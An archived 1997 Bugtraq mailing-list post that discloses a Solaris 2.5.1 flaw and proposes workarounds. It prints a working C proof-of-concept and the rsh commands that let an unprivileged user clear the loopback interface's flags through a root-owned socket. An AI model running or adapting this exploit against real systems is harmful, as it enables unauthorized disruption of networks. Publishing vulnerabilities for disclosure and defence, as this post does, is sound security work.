Bugtraq mailing list archives
Solaris 2.5.1 party piece
From: alan () LXORGUK UKUU ORG UK (Alan Cox)
Date: Thu, 19 Jun 1997 15:27:39 +0100
Well CERT have had this for a year, AUSCERT for a couple of weeks and now its time bugtraq had it cc solarisuck.c -o solarisuck -lsocket rsh localhost ./solarisuck solarisuck.c #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/sockio.h> #include <net/if.h> #include <netinet/in.h> int main(int argc, char *argv[]) { struct ifreq please_break_me; strcpy( please_break_me.ifr_name, "lo0"); please_break_me.ifr_flags=0; if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1) perror("Damn it didnt work. Obviously not Solaris ;)"); } You can adjust this to do other things. Basically any user can do network control requests on a root created socket descriptor. Workarounds: 1. Disable rsh and any non root owned inetd tasks - breaks remote tar etc 2. Run an OS that the vendor doesnt take a year to fix bugs in I have the original emails from Sun folks (Casper Dik, Alec Muffett and co) to prove Sun have sat on this for ages. Alan
Current thread:
- Re: Netscape Admin Servers /tmp/deamonstat Matthew Archibald (Jun 17)
- Re: Netscape Admin Servers /tmp/deamonstat Joe Zbiciak (Jun 17)
- Solaris 2.5.1 party piece Alan Cox (Jun 19)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- Re: Core file anomalies under BSDi 3.0 Theo de Raadt (Jun 20)
- Re: Core file anomalies under BSDi 3.0 Ariel Biener (Jun 20)
- http://www.news.com/News/Item/0,4,11759,00.html Aleph One (Jun 20)
- Re: http://www.news.com/News/Item/0,4,11759,00.html Raymond Dijkxhoorn (Jun 21)
- Re: Core file anomalies under BSDi 3.0 Stacey Son (Jun 20)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- /cgi-bin/handler - more notes Razvan Dragomirescu (Jun 19)
- Re: Solaris 2.5.1 party piece Doug Hughes (Jun 19)
- Re: Solaris 2.5.1 party piece Bojan Zdrnja (Jun 20)
- Re: Solaris 2.5.1 party piece Joe Gross (Jun 20)